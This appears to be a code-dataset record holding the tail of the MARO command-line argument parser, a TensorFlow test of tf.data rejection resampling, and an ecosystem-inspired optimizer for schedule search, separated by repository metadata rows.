examples=CliExamples.MARO_GRASS_CREATE,
parents=[global_parser]
)
parser_create.add_argument("deployment_path", help="Path of the create deployment")
parser_create.set_defaults(func=create)
# maro grass delete
from maro.cli.grass.delete import delete
parser_delete = subparsers.add_parser(
"delete",
help="Delete cluster",
examples=CliExamples.MARO_GRASS_DELETE,
parents=[global_parser]
)
parser_delete.add_argument("cluster_name", help="Name of the cluster")
parser_delete.set_defaults(func=delete)
# maro grass node
parser_node = subparsers.add_parser(
"node",
help="Manage nodes of the cluster",
parents=[global_parser]
)
parser_node.set_defaults(func=_help_func(parser=parser_node))
parser_node_subparsers = parser_node.add_subparsers()
# maro grass node scale
from maro.cli.grass.node import scale_node
parser_node_scale = parser_node_subparsers.add_parser(
"scale",
help="Scale up or scale down nodes to target number",
examples=CliExamples.MARO_GRASS_NODE_SCALE,
parents=[global_parser]
)
parser_node_scale.add_argument("cluster_name", help="Name of the cluster")
parser_node_scale.add_argument("node_size", help="Azure VM size")
parser_node_scale.add_argument("replicas", type=int, help="Target number of the nodes in the specific node_size")
parser_node_scale.set_defaults(func=scale_node)
# maro grass node start
from maro.cli.grass.node import start_node
parser_node_start = parser_node_subparsers.add_parser(
"start",
help="Start nodes",
examples=CliExamples.MARO_GRASS_NODE_START,
parents=[global_parser]
)
parser_node_start.add_argument("cluster_name", help="Name of the cluster")
parser_node_start.add_argument("node_size", help="Azure VM size")
parser_node_start.add_argument(
"replicas",
type=int,
help="Target number of the nodes need to be started in the specific node_size"
)
parser_node_start.set_defaults(func=start_node)
# maro grass node stop
from maro.cli.grass.node import stop_node
parser_node_stop = parser_node_subparsers.add_parser(
"stop",
help="Stop nodes",
examples=CliExamples.MARO_GRASS_NODE_STOP,
parents=[global_parser]
)
parser_node_stop.add_argument("cluster_name", help="Name of the cluster")
parser_node_stop.add_argument("node_size", help="Azure VM size")
parser_node_stop.add_argument(
"replicas",
type=int,
help="Target number of the nodes need to be stopped in the specific node_size"
)
parser_node_stop.set_defaults(func=stop_node)
# maro grass node list
from maro.cli.grass.node import list_node
parser_node_list = parser_node_subparsers.add_parser(
"list",
help="List details of nodes",
examples=CliExamples.MARO_GRASS_NODE_LIST,
parents=[global_parser]
)
parser_node_list.add_argument("cluster_name", help="Name of the cluster")
parser_node_list.set_defaults(func=list_node)
# maro grass node join
from maro.cli.grass.node import join_cluster
parser_node_join = parser_node_subparsers.add_parser(
"join",
help="Let one node join in a cluster in on-premises mode.",
examples=CliExamples.MARO_GRASS_NODE_JOIN,
parents=[global_parser]
)
parser_node_join.add_argument("deployment_path", help="The node join description file path.")
parser_node_join.set_defaults(func=join_cluster)
# maro grass node leave
from maro.cli.grass.node import leave_cluster
parser_node_leave = parser_node_subparsers.add_parser(
"leave",
help="make node leave to cluster",
examples=CliExamples.MARO_GRASS_NODE_LEAVE,
parents=[global_parser]
)
parser_node_leave.add_argument(
"deployment_path",
nargs="?",
default={},
help="The node join description file path."
)
parser_node_leave.set_defaults(func=leave_cluster)
# maro grass image
parser_image = subparsers.add_parser(
"image",
help="Manage images of the cluster",
parents=[global_parser]
)
parser_image.set_defaults(func=_help_func(parser=parser_image))
parser_image_subparsers = parser_image.add_subparsers()
# maro grass image push
from maro.cli.grass.image import push_image
parser_image_push = parser_image_subparsers.add_parser(
"push",
help="Push a local image to the cluster",
examples=CliExamples.MARO_GRASS_IMAGE_PUSH,
parents=[global_parser]
)
parser_image_push.add_argument("cluster_name", help="Name of the cluster")
parser_image_push.add_argument("--image-name", help="Name of the local image")
parser_image_push.add_argument("--image-path", help="Path of the local tar file")
parser_image_push.add_argument(
"--remote-context-path",
help="Absolute path of the image context in the user data storage of the cluster"
)
parser_image_push.add_argument("--remote-image-name", help="Name of the image")
parser_image_push.set_defaults(func=push_image)
# maro grass data
parser_data = subparsers.add_parser(
"data",
help="Manage user data storage in the cluster",
parents=[global_parser]
)
parser_data.set_defaults(func=_help_func(parser=parser_data))
parser_data_subparsers = parser_data.add_subparsers()
# maro grass data push
from maro.cli.grass.data import push_data
parser_data_push = parser_data_subparsers.add_parser(
"push",
help="Push the local data to the remote directory",
examples=CliExamples.MARO_GRASS_DATA_PUSH,
parents=[global_parser]
)
parser_data_push.add_argument("cluster_name", help="Name of the cluster")
parser_data_push.add_argument("local_path", help="Path of the local file")
parser_data_push.add_argument("remote_path", help="Path of the directory in the cluster data storage")
parser_data_push.set_defaults(func=push_data)
# maro grass data pull
from maro.cli.grass.data import pull_data
parser_data_pull = parser_data_subparsers.add_parser(
"pull",
help="Pull the remote data to the local directory",
examples=CliExamples.MARO_GRASS_DATA_PULL,
parents=[global_parser]
)
parser_data_pull.add_argument("cluster_name", help="Name of the cluster")
parser_data_pull.add_argument("remote_path", help="Path of the file in the cluster data storage")
parser_data_pull.add_argument("local_path", help="Path of the directory in the local")
parser_data_pull.set_defaults(func=pull_data)
# maro grass job
parser_job = subparsers.add_parser(
"job",
help="Manage jobs",
parents=[global_parser]
)
parser_job.set_defaults(func=_help_func(parser=parser_job))
parser_job_subparsers = parser_job.add_subparsers()
# maro grass job start
from maro.cli.grass.job import start_job
parser_job_start = parser_job_subparsers.add_parser(
"start",
help="Start a training job",
examples=CliExamples.MARO_GRASS_JOB_START,
parents=[global_parser]
)
parser_job_start.add_argument("cluster_name", help="Name of the cluster")
parser_job_start.add_argument("deployment_path", help="Path of the job deployment")
parser_job_start.set_defaults(func=start_job)
# maro grass job stop
from maro.cli.grass.job import stop_job
parser_job_stop = parser_job_subparsers.add_parser(
"stop",
help="Stop a training job",
examples=CliExamples.MARO_GRASS_JOB_STOP,
parents=[global_parser]
)
parser_job_stop.add_argument("cluster_name", help="Name of the cluster")
parser_job_stop.add_argument("job_name", help="Name of the job")
parser_job_stop.set_defaults(func=stop_job)
# maro grass job list
from maro.cli.grass.job import list_job
parser_job_list = parser_job_subparsers.add_parser(
"list",
help="List details of jobs",
examples=CliExamples.MARO_GRASS_JOB_LIST,
parents=[global_parser]
)
parser_job_list.add_argument("cluster_name", help="Name of the cluster")
parser_job_list.set_defaults(func=list_job)
# maro grass job logs
from maro.cli.grass.job import get_job_logs
parser_job_logs = parser_job_subparsers.add_parser(
"logs",
help="Get logs of the job",
examples=CliExamples.MARO_GRASS_JOB_LOGS,
parents=[global_parser]
)
parser_job_logs.add_argument("cluster_name", help="Name of the cluster")
parser_job_logs.add_argument("job_name", help="Name of the job")
parser_job_logs.set_defaults(func=get_job_logs)
# maro grass schedule
parser_schedule = subparsers.add_parser(
"schedule",
help="Manage schedules",
parents=[global_parser]
)
parser_schedule.set_defaults(func=_help_func(parser=parser_schedule))
parser_schedule_subparsers = parser_schedule.add_subparsers()
# maro grass schedule start
from maro.cli.grass.schedule import start_schedule
parser_schedule_start = parser_schedule_subparsers.add_parser(
"start",
help="Start a schedule",
examples=CliExamples.MARO_GRASS_SCHEDULE_START,
parents=[global_parser]
)
parser_schedule_start.add_argument("cluster_name", help="Name of the cluster")
parser_schedule_start.add_argument("deployment_path", help="Path of the schedule deployment")
parser_schedule_start.set_defaults(func=start_schedule)
# maro grass schedule stop
from maro.cli.grass.schedule import stop_schedule
parser_schedule_stop = parser_schedule_subparsers.add_parser(
"stop",
help="Stop a schedule",
examples=CliExamples.MARO_GRASS_SCHEDULE_STOP,
parents=[global_parser]
)
parser_schedule_stop.add_argument("cluster_name", help="Name of the cluster")
parser_schedule_stop.add_argument("schedule_name", help="Name of the schedule")
parser_schedule_stop.set_defaults(func=stop_schedule)
# maro grass clean
from maro.cli.grass.clean import clean
parser_clean = subparsers.add_parser(
"clean",
help="Clean cluster",
examples=CliExamples.MARO_GRASS_CLEAN,
parents=[global_parser]
)
parser_clean.add_argument("cluster_name", help="Name of the cluster")
parser_clean.set_defaults(func=clean)
# maro grass status
from maro.cli.grass.status import status
parser_status = subparsers.add_parser(
"status",
help="Get status of the cluster",
examples=CliExamples.MARO_GRASS_STATUS,
parents=[global_parser]
)
parser_status.add_argument("cluster_name", help="Name of the cluster")
parser_status.add_argument("resource_name", help="Name of the resource")
parser_status.set_defaults(func=status)
# maro grass template
from maro.cli.grass.template import template
parser_clean = subparsers.add_parser(
"template",
help="Get deployment templates",
examples=CliExamples.MARO_GRASS_TEMPLATES,
parents=[global_parser]
)
parser_clean.add_argument("export_path", default="./", help="Path of the export directory")
parser_clean.set_defaults(func=template)
def load_parser_env(prev_parser: ArgumentParser, global_parser) -> None:
from maro.cli.envs.list_available import list_scenarios, list_topologies
subparsers = prev_parser.add_subparsers()
# maro env list
parser_list = subparsers.add_parser(
'list',
help='List name of built-in scenarios.',
parents=[global_parser]
)
parser_list.set_defaults(func=list_scenarios)
# maro env topologies --scenario name
parser_topo = subparsers.add_parser(
'topology',
help='Get built-in topologies for specified scenario.',
parents=[global_parser]
)
parser_topo.add_argument(
'-s', '--scenario',
required=True,
help='Scenario name to show topologies.'
)
parser_topo.set_defaults(func=list_topologies)
# MARO env data command
parser_env_data = subparsers.add_parser(
'data',
help="Generate predefined scenario related data.",
parents=[global_parser]
)
parser_env_data.set_defaults(func=_help_func(parser=parser_env_data))
# Generate data for a specific scenario and topology.
from maro.cli.data_pipeline.data_process import generate, list_env
from maro.simulator.utils.common import get_scenarios
data_subparsers = parser_env_data.add_subparsers()
generate_cmd_parser = data_subparsers.add_parser(
"generate",
help="Generate data for a specific scenario and topology.",
parents=[global_parser])
generate_cmd_parser.add_argument(
"-s", "--scenario",
required=True,
choices=get_scenarios(),
help="Scenario of environment.")
generate_cmd_parser.add_argument(
"-t", "--topology",
required=True,
help="Topology of scenario.")
generate_cmd_parser.add_argument(
"-f", "--forced",
action="store_true",
help="Re-generate forcibly.")
generate_cmd_parser.set_defaults(func=generate)
list_cmd_parser = data_subparsers.add_parser(
"list",
help="List predefined environments that need generate data extraly.",
parents=[global_parser])
list_cmd_parser.set_defaults(func=list_env)
def load_parser_k8s(prev_parser: ArgumentParser, global_parser: ArgumentParser) -> None:
subparsers = prev_parser.add_subparsers()
# maro k8s create
from maro.cli.k8s.create import create
parser_create = subparsers.add_parser(
"create",
help="Create cluster",
examples=CliExamples.MARO_K8S_CREATE,
parents=[global_parser]
)
parser_create.add_argument("deployment_path", help="Path of the create deployment")
parser_create.set_defaults(func=create)
# maro k8s delete
from maro.cli.k8s.delete import delete
parser_create = subparsers.add_parser(
"delete",
help="Delete cluster",
examples=CliExamples.MARO_K8S_DELETE,
parents=[global_parser]
)
parser_create.add_argument("cluster_name", help="Name of the cluster")
parser_create.set_defaults(func=delete)
# maro k8s node
parser_node = subparsers.add_parser(
"node",
help="Manage nodes of the cluster",
parents=[global_parser]
)
parser_node.set_defaults(func=_help_func(parser=parser_node))
parser_node_subparsers = parser_node.add_subparsers()
# maro k8s node scale
from maro.cli.k8s.node import scale_node
parser_node_scale = parser_node_subparsers.add_parser(
"scale",
help="Scale up or scale down nodes to target number",
examples=CliExamples.MARO_K8S_NODE_SCALE,
parents=[global_parser]
)
parser_node_scale.add_argument("cluster_name", help="Name of the cluster")
parser_node_scale.add_argument("node_size", help="Azure VM size")
parser_node_scale.add_argument("replicas", type=int, help="Target number of the nodes in the specific node_size")
parser_node_scale.set_defaults(func=scale_node)
# maro k8s node list
from maro.cli.k8s.node import list_node
parser_node_scale = parser_node_subparsers.add_parser(
"list",
help="List details of nodes",
examples=CliExamples.MARO_K8S_NODE_LIST,
parents=[global_parser]
)
parser_node_scale.add_argument("cluster_name", help="Name of the cluster")
parser_node_scale.set_defaults(func=list_node)
# maro k8s image
parser_image = subparsers.add_parser(
"image",
help="Manage images of the cluster",
parents=[global_parser]
)
parser_image.set_defaults(func=_help_func(parser=parser_image))
parser_image_subparsers = parser_image.add_subparsers()
# maro k8s image push
from maro.cli.k8s.image import push_image
parser_image_push = parser_image_subparsers.add_parser(
"push",
help="Push a local image to the cluster",
examples=CliExamples.MARO_K8S_IMAGE_PUSH,
parents=[global_parser]
)
parser_image_push.add_argument("cluster_name", help="Name of the cluster")
parser_image_push.add_argument("--image-name", help="Name of the local image")
parser_image_push.set_defaults(func=push_image)
# maro k8s image list
from maro.cli.k8s.image import list_image
parser_image_push = parser_image_subparsers.add_parser(
"list",
help="List the images in the cluster",
examples=CliExamples.MARO_K8S_IMAGE_LIST,
parents=[global_parser]
)
parser_image_push.add_argument("cluster_name", help="Name of the cluster")
parser_image_push.set_defaults(func=list_image)
# maro k8s data
parser_data = subparsers.add_parser(
"data",
help="Manage user data storage in the cluster",
parents=[global_parser]
)
parser_data.set_defaults(func=_help_func(parser=parser_data))
parser_data_subparsers = parser_data.add_subparsers()
# maro k8s data push
from maro.cli.k8s.data import push_data
parser_data_push = parser_data_subparsers.add_parser(
"push",
help="Push the local data to the remote directory",
examples=CliExamples.MARO_K8S_DATA_PUSH,
parents=[global_parser]
)
parser_data_push.add_argument("cluster_name", help="Name of the cluster")
parser_data_push.add_argument("local_path", help="Path of the local file")
parser_data_push.add_argument("remote_dir", help="Path of the directory in the cluster data storage")
parser_data_push.set_defaults(func=push_data)
# maro k8s data pull
from maro.cli.k8s.data import pull_data
parser_data_pull = parser_data_subparsers.add_parser(
"pull",
help="Pull the remote data to the local directory",
examples=CliExamples.MARO_K8S_DATA_PULL,
parents=[global_parser]
)
parser_data_pull.add_argument("cluster_name", help="Name of the cluster")
parser_data_pull.add_argument("remote_path", help="Path of the file in the cluster data storage")
parser_data_pull.add_argument("local_dir", help="Path of the directory in the local")
parser_data_pull.set_defaults(func=pull_data)
# maro k8s data remove
from maro.cli.k8s.data import remove_data
parser_data_pull = parser_data_subparsers.add_parser(
"remove",
help="Remove data in the cluster data storage",
parents=[global_parser]
)
parser_data_pull.add_argument("cluster_name", help="Name of the cluster")
parser_data_pull.add_argument("remote_path", help="Path of the file in the cluster data storage")
parser_data_pull.set_defaults(func=remove_data)
# maro k8s job
parser_job = subparsers.add_parser(
"job",
help="Manage jobs",
parents=[global_parser]
)
parser_job.set_defaults(func=_help_func(parser=parser_job))
parser_job_subparsers = parser_job.add_subparsers()
# maro k8s job start
from maro.cli.k8s.job import start_job
parser_job_start = parser_job_subparsers.add_parser(
"start",
help="Start a training job",
examples=CliExamples.MARO_K8S_JOB_START,
parents=[global_parser]
)
parser_job_start.add_argument("cluster_name", help="Name of the cluster")
parser_job_start.add_argument("deployment_path", help="Path of the job deployment")
parser_job_start.set_defaults(func=start_job)
# maro k8s job stop
from maro.cli.k8s.job import stop_job
parser_job_stop = parser_job_subparsers.add_parser(
"stop",
help="Stop a training job",
examples=CliExamples.MARO_K8S_JOB_STOP,
parents=[global_parser]
)
parser_job_stop.add_argument("cluster_name", help="Name of the cluster")
parser_job_stop.add_argument("job_name", help="Name of the job")
parser_job_stop.set_defaults(func=stop_job)
# maro k8s job logs
from maro.cli.k8s.job import get_job_logs
parser_job_logs = parser_job_subparsers.add_parser(
"logs",
help="Get logs of the job",
parents=[global_parser]
)
parser_job_logs.add_argument("cluster_name", help="Name of the cluster")
parser_job_logs.add_argument("job_name", help="Name of the job")
parser_job_logs.set_defaults(func=get_job_logs)
# maro k8s job list
from maro.cli.k8s.job import list_job
parser_job_list = parser_job_subparsers.add_parser(
"list",
help="List details of jobs",
parents=[global_parser]
)
parser_job_list.add_argument("cluster_name", help="Name of the cluster")
parser_job_list.set_defaults(func=list_job)
# maro k8s schedule
parser_schedule = subparsers.add_parser(
"schedule",
help="Manage schedules",
parents=[global_parser]
)
parser_schedule.set_defaults(func=_help_func(parser=parser_schedule))
parser_schedule_subparsers = parser_schedule.add_subparsers()
# maro k8s schedule start
from maro.cli.k8s.schedule import start_schedule
parser_schedule_start = parser_schedule_subparsers.add_parser(
"start",
help="Start a schedule",
examples=CliExamples.MARO_K8S_SCHEDULE_START,
parents=[global_parser]
)
parser_schedule_start.add_argument("cluster_name", help="Name of the cluster")
parser_schedule_start.add_argument("deployment_path", help="Path of the schedule deployment")
parser_schedule_start.set_defaults(func=start_schedule)
# maro k8s schedule stop
from maro.cli.k8s.schedule import stop_schedule
parser_schedule_stop = parser_schedule_subparsers.add_parser(
"stop",
help="Stop a schedule",
examples=CliExamples.MARO_K8S_SCHEDULE_STOP,
parents=[global_parser]
)
parser_schedule_stop.add_argument("cluster_name", help="Name of the cluster")
parser_schedule_stop.add_argument("schedule_name", help="Name of the schedule")
parser_schedule_stop.set_defaults(func=stop_schedule)
# maro k8s status
from maro.cli.k8s.status import status
parser_status = subparsers.add_parser(
"status",
help="Get status of the cluster",
examples=CliExamples.MARO_K8S_STATUS,
parents=[global_parser]
)
parser_status.add_argument("cluster_name", help="Name of the cluster")
parser_status.set_defaults(func=status)
# maro k8s template
from maro.cli.k8s.template import template
parser_template = subparsers.add_parser(
"template",
help="Get deployment templates",
examples=CliExamples.MARO_K8S_TEMPLATE,
parents=[global_parser]
)
parser_template.add_argument("export_path", default="./", help="Path of the export directory")
parser_template.set_defaults(func=template)
def load_parser_data(prev_parser: ArgumentParser, global_parser: ArgumentParser):
data_cmd_sub_parsers = prev_parser.add_subparsers()
# BUILD
from maro.cli.data_pipeline.utils import convert
build_cmd_parser = data_cmd_sub_parsers.add_parser(
"build",
fromfile_prefix_chars="@",
help="Build csv file to a strong type tight binary file.",
parents=[global_parser])
build_cmd_parser.add_argument(
"--meta",
type=str,
required=True,
help="Metafile for binary file building.")
build_cmd_parser.add_argument(
"--file",
type=str,
required=True,
nargs="+",
help="""
Path to original csv file(s) used to build,
you can save your files' name into a file and call with prefix @ to read files list from your file,
like 'maro data build --meta meta.yml --output o.bin --file @files.txt'
or just convert 1 file like 'maro data build --meta meta.yml --output o.bin --file input_file.csv'
""")
build_cmd_parser.add_argument(
"--output",
type=str,
required=True,
help="Path (with file name) to dump the binary file.")
build_cmd_parser.add_argument(
"--start-timestamp",
dest="start_timestamp",
type=int,
default=None,
required=False,
help="""
Specified start timestamp (in UTC) for binary file,
then this timestamp will be considered as tick=0 for binary reader,
this can be used to adjust the reader pipeline.
""")
build_cmd_parser.set_defaults(func=convert)
def load_parser_meta(prev_parser: ArgumentParser, global_parser: ArgumentParser):
meta_cmd_sub_parsers = prev_parser.add_subparsers()
# Deploy
from maro.cli.data_pipeline.data_process import meta_deploy
deploy_cmd_parser = meta_cmd_sub_parsers.add_parser(
"deploy",
help="Deploy data files for MARO.",
parents=[global_parser])
deploy_cmd_parser.set_defaults(func=meta_deploy)
def load_parser_inspector(prev_parser: ArgumentParser, global_parser: ArgumentParser):
inspector_cmd_sub_parsers = prev_parser.add_subparsers()
from maro.cli.inspector.env_data_process import start_vis
dashboard_cmd_parser = inspector_cmd_sub_parsers.add_parser(
"dashboard",
fromfile_prefix_chars="@",
help="Dashboard of selected env displayed.",
parents=[global_parser]
)
dashboard_cmd_parser.add_argument(
"--source_path",
type=str,
required=True,
help="Folder path to load data, should be root path of snapshot folders. e.g. ~/project_root/dump_files/"
)
dashboard_cmd_parser.add_argument(
"--force",
type=str,
required=False,
default="True",
help="Overwrite the generated summary data or not: True/False."
)
dashboard_cmd_parser.set_defaults(func=start_vis)
from maro.cli.maro_real_time_vis.start_maro_geo_vis import start_geo_vis
geo_cmd_parser = inspector_cmd_sub_parsers.add_parser(
"geo",
fromfile_prefix_chars="@",
help="Geographic data display.",
parents=[global_parser]
)
geo_cmd_parser.add_argument(
"--start",
type=str,
help="Kind of container expected to start, Database or Service.",
required=True
)
geo_cmd_parser.add_argument(
"--experiment_name",
type=str,
required=False,
help="Name of experiment expected to be displayed."
)
geo_cmd_parser.add_argument(
"--front_end_port",
type=int,
required=False,
help="Specified port of front_end."
)
geo_cmd_parser.set_defaults(func=start_geo_vis)
def load_parser_project(prev_parser: ArgumentParser, global_parser: ArgumentParser):
sub_parsers = prev_parser.add_subparsers()
from maro.cli.project_generator.project_generator import new_project
# maro project new
new_cmd_parser = sub_parsers.add_parser(
"new",
help="Generate a new project under current directory to work with MARO.",
parents=[global_parser]
)
# This command do not accept arguments as normal, instead with a simple wizard.
new_cmd_parser.set_defaults(func=new_project)
def load_parser_admin(prev_parser: ArgumentParser, global_parser: ArgumentParser):
sub_parsers = prev_parser.add_subparsers()
# Start
from maro.cli.utils.node_admin import start_admin
start_parser = sub_parsers.add_parser(
"start",
help="Start MARO admin web server.",
parents=[global_parser])
start_parser.set_defaults(func=start_admin)
# Stop
from maro.cli.utils.node_admin import stop_admin
stop_parser = sub_parsers.add_parser(
"stop",
help="Stop MARO admin web server.",
parents=[global_parser])
stop_parser.set_defaults(func=stop_admin)
# Requirements
from maro.cli.utils.node_admin import requirements_admin
req_parser = sub_parsers.add_parser(
"req",
help="Install requirements for MARO admin web server.",
parents=[global_parser])
req_parser.set_defaults(func=requirements_admin)
def _help_func(parser):
def wrapper(*args, **kwargs):
parser.print_help()
return wrapper
def _get_actual_args(namespace: Namespace) -> dict:
actual_args = vars(deepcopy(namespace))
return actual_args
if __name__ == '__main__':
main()
| 35.267389
| 117
| 0.698983
|
063e12309080ed2776f217a532fde48b49a1c930
| 5,154
|
py
|
Python
|
tensorflow/python/data/experimental/kernel_tests/rejection_resample_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 36
|
2016-12-17T15:25:25.000Z
|
2022-01-29T21:50:53.000Z
|
tensorflow/python/data/experimental/kernel_tests/rejection_resample_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 59
|
2019-06-17T09:37:49.000Z
|
2022-01-19T01:21:34.000Z
|
tensorflow/python/data/experimental/kernel_tests/rejection_resample_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 36
|
2017-07-27T21:12:40.000Z
|
2022-02-03T16:45:56.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.experimental.rejection_resample()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python.data.experimental.ops import resampling
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
@test_util.run_all_in_graph_and_eager_modes
class RejectionResampleTest(test_base.DatasetTestBase, parameterized.TestCase):
@parameterized.named_parameters(
("InitialDistributionKnown", True),
("InitialDistributionUnknown", False))
def testDistribution(self, initial_known):
classes = np.random.randint(5, size=(20000,)) # Uniformly sampled
target_dist = [0.9, 0.05, 0.05, 0.0, 0.0]
initial_dist = [0.2] * 5 if initial_known else None
classes = math_ops.cast(classes, dtypes.int64) # needed for Windows build.
dataset = dataset_ops.Dataset.from_tensor_slices(classes).shuffle(
200, seed=21).map(lambda c: (c, string_ops.as_string(c))).repeat()
get_next = self.getNext(
dataset.apply(
resampling.rejection_resample(
target_dist=target_dist,
initial_dist=initial_dist,
class_func=lambda c, _: c,
seed=27)))
returned = []
while len(returned) < 4000:
returned.append(self.evaluate(get_next()))
returned_classes, returned_classes_and_data = zip(*returned)
_, returned_data = zip(*returned_classes_and_data)
self.assertAllEqual([compat.as_bytes(str(c))
for c in returned_classes], returned_data)
total_returned = len(returned_classes)
class_counts = np.array([
len([True for v in returned_classes if v == c])
for c in range(5)])
returned_dist = class_counts / total_returned
self.assertAllClose(target_dist, returned_dist, atol=1e-2)
@parameterized.named_parameters(
("OnlyInitial", True),
("NotInitial", False))
def testEdgeCasesSampleFromInitialDataset(self, only_initial_dist):
init_dist = [0.5, 0.5]
target_dist = [0.5, 0.5] if only_initial_dist else [0.0, 1.0]
num_classes = len(init_dist)
# We don't need many samples to test that this works.
num_samples = 100
data_np = np.random.choice(num_classes, num_samples, p=init_dist)
dataset = dataset_ops.Dataset.from_tensor_slices(data_np)
# Reshape distribution.
dataset = dataset.apply(
resampling.rejection_resample(
class_func=lambda x: x,
target_dist=target_dist,
initial_dist=init_dist))
get_next = self.getNext(dataset)
returned = []
with self.assertRaises(errors.OutOfRangeError):
while True:
returned.append(self.evaluate(get_next()))
def testRandomClasses(self):
init_dist = [0.25, 0.25, 0.25, 0.25]
target_dist = [0.0, 0.0, 0.0, 1.0]
num_classes = len(init_dist)
# We don't need many samples to test a dirac-delta target distribution.
num_samples = 100
data_np = np.random.choice(num_classes, num_samples, p=init_dist)
dataset = dataset_ops.Dataset.from_tensor_slices(data_np)
# Apply a random mapping that preserves the data distribution.
def _remap_fn(_):
return math_ops.cast(random_ops.random_uniform([1]) * num_classes,
dtypes.int32)[0]
dataset = dataset.map(_remap_fn)
# Reshape distribution.
dataset = dataset.apply(
resampling.rejection_resample(
class_func=lambda x: x,
target_dist=target_dist,
initial_dist=init_dist))
get_next = self.getNext(dataset)
returned = []
with self.assertRaises(errors.OutOfRangeError):
while True:
returned.append(self.evaluate(get_next()))
classes, _ = zip(*returned)
bincount = np.bincount(
np.array(classes),
minlength=num_classes).astype(np.float32) / len(classes)
self.assertAllClose(target_dist, bincount, atol=1e-2)
if __name__ == "__main__":
test.main()
| 36.553191
| 80
| 0.697711
|
9be2d4efd921d8909122c6e3ac2881c38ebeed12
| 4,354
|
py
|
Python
|
optimizer/AEO.py
|
thieu1995/IFCB
|
4a5936f93e4e317915dfcd12682829cf20a39552
|
[
"MIT"
] | 4
|
2021-02-05T13:45:23.000Z
|
2022-03-09T05:44:58.000Z
|
optimizer/AEO.py
|
bkc-group/IFCB
|
1ada1151eb057510c16b0ed66b980b736603a0e5
|
[
"MIT"
] | null | null | null |
optimizer/AEO.py
|
bkc-group/IFCB
|
1ada1151eb057510c16b0ed66b980b736603a0e5
|
[
"MIT"
] | 2
|
2021-02-15T14:55:22.000Z
|
2021-03-13T08:48:17.000Z
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu" at 12:27, 15/01/2021 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Nguyen_Thieu2 %
# Github: https://github.com/thieu1995 %
# ------------------------------------------------------------------------------------------------------%
from copy import deepcopy
from config import Config
from optimizer.root import Root
from numpy.random import uniform, randint, normal
from utils.schedule_util import matrix_to_schedule
class BaseAEO(Root):
def __init__(self, problem=None, pop_size=10, epoch=2, func_eval=100000, lb=None, ub=None, verbose=True, paras=None):
super().__init__(problem, pop_size, epoch, func_eval, lb, ub, verbose)
def evolve(self, pop=None, fe_mode=None, epoch=None, g_best=None):
# Sorted population in the descending order of the function fitness value
if Config.METRICS in Config.METRICS_MAX:
pop = sorted(pop, key=lambda item: item[self.ID_FIT])
else:
pop = sorted(pop, key=lambda item: item[self.ID_FIT], reverse=True)
pop_new = deepcopy(pop)
## Production - Update the worst solution
# Eq. 2, 3, 1
a = (1.0 - epoch / self.epoch) * uniform()
while True:
child = (1 - a) * pop[-1][self.ID_POS] + a * uniform(self.lb, self.ub, pop[-1][self.ID_POS].shape)
schedule = matrix_to_schedule(self.problem, child)
if schedule.is_valid():
fit = self.Fit.fitness(schedule)
break
pop_new[0] = [child, fit]
## Consumption
for i in range(2, self.pop_size):
while True:
rand = uniform()
# Eq. 4, 5, 6
v1 = normal(0, 1)
v2 = normal(0, 1)
c = 0.5 * v1 / abs(v2) # Consumption factor
j = randint(1, i)
### Herbivore
if rand < 1.0 / 3:
child = pop[i][self.ID_POS] + c * (pop[i][self.ID_POS] - pop[0][self.ID_POS]) # Eq. 6
### Carnivore
elif 1.0 / 3 <= rand and rand <= 2.0 / 3:
child = pop[i][self.ID_POS] + c * (pop[i][self.ID_POS] - pop[j][self.ID_POS]) # Eq. 7
### Omnivore
else:
r2 = uniform()
child = pop[i][self.ID_POS] + c * (r2 * (pop[i][self.ID_POS] - pop[0][self.ID_POS]) + (1 - r2) * (pop[i][self.ID_POS] - pop[j][self.ID_POS]))
child = self.amend_position_random(child)
schedule = matrix_to_schedule(self.problem, child)
if schedule.is_valid():
fit = self.Fit.fitness(schedule)
break
pop_new[i] = [child, fit]
## Update old population
pop = self.update_old_population(pop, pop_new)
## find current best used in decomposition
current_best = self.get_current_best(pop)
## Decomposition
### Eq. 10, 11, 12, 9
for i in range(0, self.pop_size):
while True:
r3 = uniform()
d = 3 * normal(0, 1)
e = r3 * randint(1, 3) - 1
h = 2 * r3 - 1
child = current_best[self.ID_POS] + d * (e * current_best[self.ID_POS] - h * pop[i][self.ID_POS])
child = self.amend_position_random(child)
schedule = matrix_to_schedule(self.problem, child)
if schedule.is_valid():
fit = self.Fit.fitness(schedule)
break
pop_new[i] = [child, fit]
## Update old population
pop = self.update_old_population(pop, pop_new)
if fe_mode is None:
return pop
else:
counter = 2 * self.pop_size # pop_new + pop_mutation operations
return pop, counter
| 46.319149
| 161
| 0.469453
|
48e3bc3121eaed2a85e0fe947aae515ff3c24c25
| 17,528
|
py
|
Python
|
code/Andre/py/refit_unet_d8g_222_swrap_03.py
|
astoc/kaggle_dsb2017
|
2421442cb220518d9ad70b0f3f7611ccf6303af4
|
[
"MIT"
] | 9
|
2017-08-08T16:38:54.000Z
|
2019-07-20T07:50:16.000Z
|
code/Andre/py/refit_unet_d8g_222_swrap_03.py
|
astoc/kaggle_dsb2017
|
2421442cb220518d9ad70b0f3f7611ccf6303af4
